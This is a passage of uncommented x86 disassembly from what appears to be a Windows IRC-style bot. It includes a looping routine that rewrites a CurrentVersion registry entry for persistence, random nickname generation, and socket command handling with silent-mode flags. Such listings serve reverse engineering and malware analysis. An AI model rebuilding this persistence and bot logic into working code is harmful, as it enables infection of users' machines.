sub_416ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F32 proc near ; CODE XREF: sub_419477+134�p
; sub_419A9F+F2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D004
test eax, eax
jz short loc_416F65
push [ebp+var_4]
call ds:dword_41D010
xor al, al
loc_416F62: ; CODE XREF: sub_416F32+4E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416F65: ; CODE XREF: sub_416F32+23�j
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D000
test eax, eax
jz short loc_416F82
loc_416F75: ; CODE XREF: sub_416F32+52�j
push [ebp+var_4]
call ds:dword_41D010
mov al, bl
jmp short loc_416F62
; ---------------------------------------------------------------------------
loc_416F82: ; CODE XREF: sub_416F32+41�j
mov bl, 1
jmp short loc_416F75
sub_416F32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=94h
sub_416F86 proc near ; CODE XREF: J8@F_7_S:loc_41BF0D�p
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-94h]
sub esp, 114h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+94h+var_4], eax
push ebx
push esi
push edi
mov edi, 100h
push edi
call sub_402648
mov esi, eax
push edi
mov [ebp+94h+var_110], esi
call sub_402648
push edi
mov [ebp+94h+var_108], eax
call sub_402648
push edi
mov [ebp+94h+var_114], eax
call sub_402648
push [ebp+94h+var_114]
mov [ebp+94h+var_10C], eax
call sub_402A45
push eax
xor ebx, ebx
push ebx
push [ebp+94h+var_114]
call sub_407B70
push [ebp+94h+var_10C]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_10C]
call sub_407B70
push edi
lea eax, [ebp+94h+var_104]
push ebx
push eax
call sub_407B70
push esi
call sub_402A45
add esp, 40h
push eax
push ebx
push esi
call sub_407B70
push [ebp+94h+var_108]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_108]
call sub_407B70
push esi
call sub_402A45
push eax
mov ebx, offset byte_425119
call sub_4196D1
mov esi, [ebp+94h+var_108]
push esi
call sub_402A45
push eax
mov ebx, offset byte_425061
call sub_4196D1
mov ebx, [ebp+94h+var_114]
push ebx
call sub_402A45
add esp, 30h
dec eax
push eax
push ebx
call ds:dword_41D0F4
push esi
mov esi, [ebp+94h+var_10C]
push ebx
push offset dword_4200F0
push esi
call sub_402A45
pop ecx
dec eax
push eax
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41707E: ; CODE XREF: sub_416F86+FD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41707E
sub eax, ecx
push edi
mov [eax+esi], dl
lea eax, [ebp+94h+var_104]
push eax
push [ebp+94h+var_110]
push offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_4170D1
lea eax, [ebp+94h+var_104]
mov ecx, esi
loc_4170AA: ; CODE XREF: sub_416F86+13C�j
mov dl, [ecx]
cmp dl, [eax]
jnz short loc_4170C8
test dl, dl
jz short loc_4170C4
mov dl, [ecx+1]
cmp dl, [eax+1]
jnz short loc_4170C8
inc ecx
inc ecx
inc eax
inc eax
test dl, dl
jnz short loc_4170AA
loc_4170C4: ; CODE XREF: sub_416F86+12C�j
xor eax, eax
jmp short loc_4170CD
; ---------------------------------------------------------------------------
loc_4170C8: ; CODE XREF: sub_416F86+128�j
; sub_416F86+134�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4170CD: ; CODE XREF: sub_416F86+140�j
test eax, eax
jz short loc_4170E2
loc_4170D1: ; CODE XREF: sub_416F86+11D�j
push esi
push [ebp+94h+var_110]
push offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_4170E2: ; CODE XREF: sub_416F86+149�j
push [ebp+94h+var_110]
call sub_402B9B
push [ebp+94h+var_108]
call sub_402B9B
push ebx
call sub_402B9B
push esi
call sub_402B9B
mov ecx, [ebp+94h+var_4]
add esp, 10h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 94h
leave
retn
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_417119 proc near ; DATA XREF: J8@F_7_S:0041BF1E�o
var_504 = byte ptr -504h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_304 = byte ptr -304h
var_303 = byte ptr -303h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 504h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 0FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push esi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
push esi
lea eax, [ebp+var_303]
push ebx
push eax
mov [ebp+var_304], bl
call sub_407B70
push esi
lea eax, [ebp+var_103]
push ebx
push eax
mov [ebp+var_104], bl
call sub_407B70
add esp, 30h
mov edi, 100h
loc_41718E: ; CODE XREF: sub_417119+1AE�j
push edi
lea esi, [ebp+var_204]
mov ebx, offset byte_425119
call sub_4196D1
push edi
lea esi, [ebp+var_404]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
pop ecx
mov esi, 0FFh
push esi
lea eax, [ebp+var_304]
push eax
call ds:dword_41D0F4
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_304]
push eax
push offset aSS_3 ; "%s\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_104]
add esp, 14h
lea ecx, [eax+1]
loc_4171F1: ; CODE XREF: sub_417119+DD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4171F1
sub eax, ecx
xor ebx, ebx
mov [ebp+eax+var_104], bl
push edi
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_417258
lea ecx, [ebp+var_504]
lea eax, [ebp+var_104]
loc_417231: ; CODE XREF: sub_417119+130�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_41724F
cmp dl, bl
jz short loc_41724B
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_41724F
inc eax
inc eax
inc ecx
inc ecx
cmp dl, bl
jnz short loc_417231
loc_41724B: ; CODE XREF: sub_417119+120�j
xor eax, eax
jmp short loc_417254
; ---------------------------------------------------------------------------
loc_41724F: ; CODE XREF: sub_417119+11C�j
; sub_417119+128�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417254: ; CODE XREF: sub_417119+134�j
cmp eax, ebx
jz short loc_417273
loc_417258: ; CODE XREF: sub_417119+10A�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_417273: ; CODE XREF: sub_417119+13D�j
push edi
lea eax, [ebp+var_304]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_104]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_504]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_204]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_404]
push ebx
push eax
call sub_407B70
add esp, 3Ch
push 3A98h
call ds:dword_41D0FC
jmp loc_41718E
sub_417119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172CC proc near ; CODE XREF: sub_41783D+24F�p
; sub_41783D+323�p ...
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, 1FFh
push esi
lea eax, [ebp+var_203]
push 0
push eax
mov [ebp+var_204], 0
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push esi
push eax
call sub_403436
lea eax, [ebp+var_204]
add esp, 1Ch
lea esi, [eax+1]
loc_41731B: ; CODE XREF: sub_4172CC+54�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41731B
sub eax, esi
mov [ebp+eax+var_204], cl
lea eax, [ebp+var_204]
lea esi, [eax+1]
loc_417334: ; CODE XREF: sub_4172CC+6D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417334
push 0
sub eax, esi
push eax
lea eax, [ebp+var_204]
push eax
push dword ptr [edi]
call ds:dword_41D228
mov ecx, [ebp+var_4]
test eax, eax
setnz al
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_4172CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417361 proc near ; CODE XREF: sub_40177B+268�p
; sub_4019F3+21A�p ...
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 40Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_408], eax
mov eax, [ebp+arg_8]
mov edi, 1FFh
xor ebx, ebx
push edi
mov [ebp+var_40C], eax
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push edi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
add esp, 18h
cmp [ebp+arg_4], 1
jz loc_41747D
push esi
push 0Dh
call sub_402648
mov esi, eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_404]
push edi
push eax
call sub_403436
lea eax, [ebp+var_404]
add esp, 14h
lea ecx, [eax+1]
loc_4173EE: ; CODE XREF: sub_417361+92�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4173EE
sub eax, ecx
push esi
mov [ebp+eax+var_404], bl
call sub_402A45
push eax
mov ebx, offset dword_425570
call sub_4196D1
lea eax, [ebp+var_404]
push eax
push [ebp+var_40C]
lea eax, [ebp+var_204]
push esi
push offset aSSS_1 ; "%s %s %s\r\n"
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_204]
add esp, 20h
lea ecx, [eax+1]
loc_41743B: ; CODE XREF: sub_417361+DF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41743B
sub eax, ecx
push esi
mov [ebp+eax+var_204], dl
call sub_402B9B
pop ecx
lea eax, [ebp+var_204]
lea ecx, [eax+1]
pop esi
loc_41745C: ; CODE XREF: sub_417361+100�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41745C
sub eax, ecx
push 0
push eax
lea eax, [ebp+var_204]
push eax
mov eax, [ebp+var_408]
push dword ptr [eax]
call ds:dword_41D228
loc_41747D: ; CODE XREF: sub_417361+5D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41748B proc near ; CODE XREF: sub_41802F+23B�p
; sub_41829C+39�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor eax, eax
mov [ebp+var_40], 0
lea edi, [ebp+var_3F]
stosw
stosb
push 0Dh
pop ecx
mov esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
lea edi, [ebp+var_3C]
rep movsd
lea eax, [ebp+var_48]
push eax
movsb
call ds:dword_41D1EC
call ds:dword_41D108
mov ecx, [ebp+var_48]
mov edx, [ebp+var_44]
add ecx, edx
cmp eax, ecx
jb short loc_4174D7
add ecx, eax
jmp short loc_4174D9
; ---------------------------------------------------------------------------
loc_4174D7: ; CODE XREF: sub_41748B+46�j
sub ecx, eax
loc_4174D9: ; CODE XREF: sub_41748B+4A�j
push ecx
call sub_403356
pop ecx
push 8
pop ecx
xor eax, eax
mov edi, ebx
rep stosd
push offset asc_420310 ; "["
stosw
push 22h
push ebx
stosb
call sub_402AEE
mov eax, ebx
add esp, 0Ch
lea esi, [eax+1]
loc_417501: ; CODE XREF: sub_41748B+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417501
xor edi, edi
sub eax, esi
push edi
mov [eax+ebx], cl
push 4
pop ecx
lea esi, [ebp+var_40]
call sub_418E51
pop ecx
mov eax, esi
push eax
push ebx
push offset aSS ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea esi, [eax+1]
loc_417535: ; CODE XREF: sub_41748B+AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417535
sub eax, esi
push edi
push 4
lea esi, [ebp+var_40]
mov [eax+ebx], cl
call sub_418E1F
mov eax, esi
push eax
push ebx
push offset aSS_0 ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea esi, [eax+1]
loc_417565: ; CODE XREF: sub_41748B+DF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417565
sub eax, esi
mov [eax+ebx], cl
call sub_419347
test al, al
jz short loc_41759C
push ebx
push offset aSp ; "%sP|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417590: ; CODE XREF: sub_41748B+10A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417590
sub eax, esi
mov [eax+ebx], cl
loc_41759C: ; CODE XREF: sub_41748B+ED�j
call sub_418DA0
mov eax, ds:dword_42659C
cmp eax, edi
mov ecx, ds:dword_426598
jg short loc_4175D8
jl short loc_4175B7
cmp ecx, 0Ah
jnb short loc_4175D8
loc_4175B7: ; CODE XREF: sub_41748B+125�j
push eax
push ecx
push ebx
push offset aS0I64u ; "%s0%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175CF: ; CODE XREF: sub_41748B+149�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175CF
jmp short loc_4175F7
; ---------------------------------------------------------------------------
loc_4175D8: ; CODE XREF: sub_41748B+123�j
; sub_41748B+12A�j
push eax
push ecx
push ebx
push offset aSI64u ; "%s%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175F0: ; CODE XREF: sub_41748B+16A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175F0
loc_4175F7: ; CODE XREF: sub_41748B+14B�j
sub eax, esi
mov byte ptr [eax+ebx], 0
xor esi, esi
cmp ds:dword_42521C, edi
jle short loc_417644
loc_417607: ; CODE XREF: sub_41748B+1B7�j
call sub_403363
push 31h
pop ecx
xor edx, edx
div ecx
movsx eax, [ebp+edx+var_3C]
push eax
push ebx
push offset aSC ; "%s%c"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea edi, [eax+1]
loc_41762F: ; CODE XREF: sub_41748B+1A9�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41762F
sub eax, edi
inc esi
mov [eax+ebx], cl
cmp esi, ds:dword_42521C
jl short loc_417607
loc_417644: ; CODE XREF: sub_41748B+17A�j
push ebx
push offset aS ; "%s]"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_41765A: ; CODE XREF: sub_41748B+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41765A
sub eax, esi
mov [eax+ebx], cl
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
mov eax, ebx
pop esi
call sub_402710
leave
retn
sub_41748B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417676 proc near ; CODE XREF: sub_41783D+6A7�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 824h
push ebx
push esi
push edi
push offset asc_4202C8 ; " "
push [ebp+arg_14]
xor ebx, ebx
mov byte ptr [ebp+var_8], 0
mov [ebp+var_4], ebx
call sub_403A34
jmp short loc_4176D8
; ---------------------------------------------------------------------------
loc_41769A: ; CODE XREF: sub_417676+68�j
mov eax, [ebp+var_4]
push offset aS_8 ; "-s"
push esi
mov [ebp+eax*4+var_820], esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_4176C6
push offset aS_9 ; "/s"
push esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz short loc_4176CA
loc_4176C6: ; CODE XREF: sub_417676+3D�j
mov byte ptr [ebp+var_8], 1
loc_4176CA: ; CODE XREF: sub_417676+4E�j
push offset asc_4202D4 ; " "
push ebx
call sub_403A34
inc [ebp+var_4]
loc_4176D8: ; CODE XREF: sub_417676+22�j
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_41769A
mov edi, [ebp+arg_0]
mov esi, [ebp+var_820]
add edi, 5
mov edx, edi
mov ecx, esi
loc_4176F0: ; CODE XREF: sub_417676+92�j
mov al, [ecx]
cmp al, [edx]
jnz short loc_41770E
test al, al
jz short loc_41770A
mov al, [ecx+1]
cmp al, [edx+1]
jnz short loc_41770E
inc ecx
inc ecx
inc edx
inc edx
test al, al
jnz short loc_4176F0
loc_41770A: ; CODE XREF: sub_417676+82�j
xor eax, eax
jmp short loc_417713
; ---------------------------------------------------------------------------
loc_41770E: ; CODE XREF: sub_417676+7E�j
; sub_417676+8A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417713: ; CODE XREF: sub_417676+96�j
cmp eax, ebx
jz short loc_417724
mov eax, edi
mov ecx, esi
call sub_419044
test eax, eax
jz short loc_417750
loc_417724: ; CODE XREF: sub_417676+9F�j
xor eax, eax
cmp [ebp+var_4], ebx
jle short loc_41774D
mov ecx, [ebp+var_4]
dec ecx
loc_41772F: ; CODE XREF: sub_417676+CF�j
cmp eax, ecx
jz short loc_417741
mov edx, [ebp+eax*4+var_81C]
mov [ebp+eax*4+var_820], edx
loc_417741: ; CODE XREF: sub_417676+BB�j
inc eax
cmp eax, [ebp+var_4]
jl short loc_41772F
mov esi, [ebp+var_820]
loc_41774D: ; CODE XREF: sub_417676+B3�j
dec [ebp+var_4]
loc_417750: ; CODE XREF: sub_417676+AC�j
cmp byte ptr [ebp+var_8], bl
jz short loc_417758
dec [ebp+var_4]
loc_417758: ; CODE XREF: sub_417676+DD�j
mov al, [esi]
cmp al, ds:byte_424FE8
jnz loc_417836
mov eax, esi
lea ecx, [eax+1]
loc_41776B: ; CODE XREF: sub_417676+FA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41776B
sub eax, ecx
push eax
lea eax, [esi+1]
push eax
push esi
call sub_403910
mov eax, ds:dword_433C40
mov esi, [eax]
mov ebx, offset dword_433C3C
mov edi, ebx
add esp, 0Ch
mov [ebp+var_C], esi
mov [ebp+var_10], edi
loc_417796: ; CODE XREF: sub_417676+192�j
test edi, edi
mov eax, ds:dword_433C40
mov [ebp+var_14], eax
jz short loc_4177A6
cmp edi, ebx
jz short loc_4177AB
loc_4177A6: ; CODE XREF: sub_417676+12A�j
call sub_402F5D
loc_4177AB: ; CODE XREF: sub_417676+12E�j
cmp esi, [ebp+var_14]
jz loc_417836
test edi, edi
jnz short loc_4177BD
call sub_402F5D
loc_4177BD: ; CODE XREF: sub_417676+140�j
cmp esi, [edi+4]
jnz short loc_4177C7
call sub_402F5D
loc_4177C7: ; CODE XREF: sub_417676+14A�j
mov ecx, [ebp+var_820]
lea eax, [esi+0Ch]
loc_4177D0: ; CODE XREF: sub_417676+172�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4177EE
test dl, dl
jz short loc_4177EA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4177EE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4177D0
loc_4177EA: ; CODE XREF: sub_417676+162�j
xor eax, eax
jmp short loc_4177F3
; ---------------------------------------------------------------------------
loc_4177EE: ; CODE XREF: sub_417676+15E�j
; sub_417676+16A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4177F3: ; CODE XREF: sub_417676+176�j
test eax, eax
jz short loc_41780A
lea edi, [ebp+var_20]
lea esi, [ebp+var_10]
call sub_40168C
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jmp short loc_417796
; ---------------------------------------------------------------------------
loc_41780A: ; CODE XREF: sub_417676+17F�j
cmp esi, [edi+4]
jnz short loc_417814
call sub_402F5D
loc_417814: ; CODE XREF: sub_417676+197�j
mov ecx, [esi+8]
mov eax, [ecx]
lea edx, [ebp+var_820]
push edx
mov edx, [ebp+var_4]
dec edx
push edx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_4]
call dword ptr [eax]
loc_417836: ; CODE XREF: sub_417676+EA�j
; sub_417676+138�j
pop edi
pop esi
pop ebx
leave
retn 18h
sub_417676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41783D proc near ; CODE XREF: sub_417F01+107�p
var_10F34 = dword ptr -10F34h
var_10734 = dword ptr -10734h
var_10730 = dword ptr -10730h
var_1072C = byte ptr -1072Ch
var_1062C = byte ptr -1062Ch
var_1052C = byte ptr -1052Ch
var_1042C = byte ptr -1042Ch
var_72C = byte ptr -72Ch
var_72B = byte ptr -72Bh
var_62C = byte ptr -62Ch
var_62B = byte ptr -62Bh
var_52C = byte ptr -52Ch
var_52B = byte ptr -52Bh
var_52A = byte ptr -52Ah
var_32C = byte ptr -32Ch
var_32B = byte ptr -32Bh
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_1AC = byte ptr -1ACh
var_1AB = byte ptr -1ABh
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10F38h
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [ebp+var_10734], eax
lea eax, [ebp+var_52B]
mov edi, ecx
push ebx
push eax
mov [ebp+var_10730], edi
mov [ebp+var_52C], bl
call sub_407B70
add esp, 0Ch
push edi
push offset aS_12 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 10h
lea edi, [eax+1]
loc_4178A5: ; CODE XREF: sub_41783D+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178A5
sub eax, edi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
push offset asc_420254 ; " :"
push eax
call sub_4037B0
push eax
push offset aS_13 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 18h
lea esi, [eax+1]
loc_4178E5: ; CODE XREF: sub_41783D+AD�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178E5
sub eax, esi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
lea esi, [eax+1]
loc_4178FE: ; CODE XREF: sub_41783D+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178FE
sub eax, esi
push eax
lea eax, [ebp+var_52A]
push eax
lea eax, [ebp+var_52C]
push eax
call sub_403910
add esp, 0Ch
push offset asc_42025C ; " "
push [ebp+var_10730]
call sub_403A34
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41797F
xor esi, esi
loc_417936: ; CODE XREF: sub_41783D+140�j
push eax
push offset aS_14 ; "%s"
lea edi, [ebp+esi+var_1072C]
push 0FFh
push edi
call sub_402AEE
mov eax, edi
add esp, 10h
lea edi, [eax+1]
loc_417956: ; CODE XREF: sub_41783D+11E�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417956
sub eax, edi
add eax, esi
push offset asc_420264 ; " "
push ebx
mov [ebp+eax+var_1072C], bl
call sub_403A34
pop ecx
add esi, 100h
cmp eax, ebx
pop ecx
jnz short loc_417936
loc_41797F: ; CODE XREF: sub_41783D+F5�j
xor eax, eax
mov [ebp+var_2C], bl
lea edi, [ebp+var_2B]
stosd
stosd
xor eax, eax
mov [ebp+var_38], bl
lea edi, [ebp+var_37]
stosd
stosd
xor eax, eax
mov [ebp+var_54], bl
lea edi, [ebp+var_53]
stosd
stosd
stosd
xor eax, eax
mov [ebp+var_20], bl
lea edi, [ebp+var_1F]
stosd
push 0FFh
stosd
lea eax, [ebp+var_32B]
push ebx
push eax
mov [ebp+var_32C], bl
call sub_407B70
add esp, 0Ch
push 2Fh
lea eax, [ebp+var_A7]
push ebx
push eax
mov [ebp+var_A8], bl
call sub_407B70
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
xor eax, eax
mov [ebp+var_44], bl
lea edi, [ebp+var_43]
stosd
add esp, 0Ch
push 7Fh
stosd
lea eax, [ebp+var_22B]
push ebx
push eax
mov [ebp+var_22C], bl
call sub_407B70
add esp, 0Ch
push 9
lea esi, [ebp+var_2C]
mov ebx, offset byte_425543
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_38]
mov ebx, offset byte_425555
call sub_4196D1
pop ecx
push 0Dh
lea esi, [ebp+var_54]
mov ebx, offset dword_425570
call sub_4196D1
pop ecx
lea ecx, [ebp+var_2C]
lea eax, [ebp+var_1072C]
loc_417A40: ; CODE XREF: sub_41783D+21B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417A5E
test dl, dl
jz short loc_417A5A
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417A5E
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417A40
loc_417A5A: ; CODE XREF: sub_41783D+20B�j
xor eax, eax
jmp short loc_417A63
; ---------------------------------------------------------------------------
loc_417A5E: ; CODE XREF: sub_41783D+207�j
; sub_41783D+213�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417A63: ; CODE XREF: sub_41783D+21F�j
test eax, eax
jnz short loc_417AA7
push 9
lea esi, [ebp+var_20]
mov ebx, offset dword_42554C
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_1062C]
push eax
mov eax, esi
push eax
push offset aSS_9 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
test al, al
jnz short loc_417A9F
loc_417A98: ; CODE XREF: sub_41783D+333�j
xor al, al
jmp loc_417EF0
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_41783D+259�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosb
loc_417AA7: ; CODE XREF: sub_41783D+228�j
lea ecx, [ebp+var_38]
lea eax, [ebp+var_1062C]
loc_417AB0: ; CODE XREF: sub_41783D+28B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417ACE
test dl, dl
jz short loc_417ACA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417ACE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AB0
loc_417ACA: ; CODE XREF: sub_41783D+27B�j
xor eax, eax
jmp short loc_417AD3
; ---------------------------------------------------------------------------
loc_417ACE: ; CODE XREF: sub_41783D+277�j
; sub_41783D+283�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417AD3: ; CODE XREF: sub_41783D+28F�j
test eax, eax
jnz loc_417B75
push 100h
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
mov ecx, esi
lea eax, [ebp+var_1052C]
loc_417AF9: ; CODE XREF: sub_41783D+2D4�j
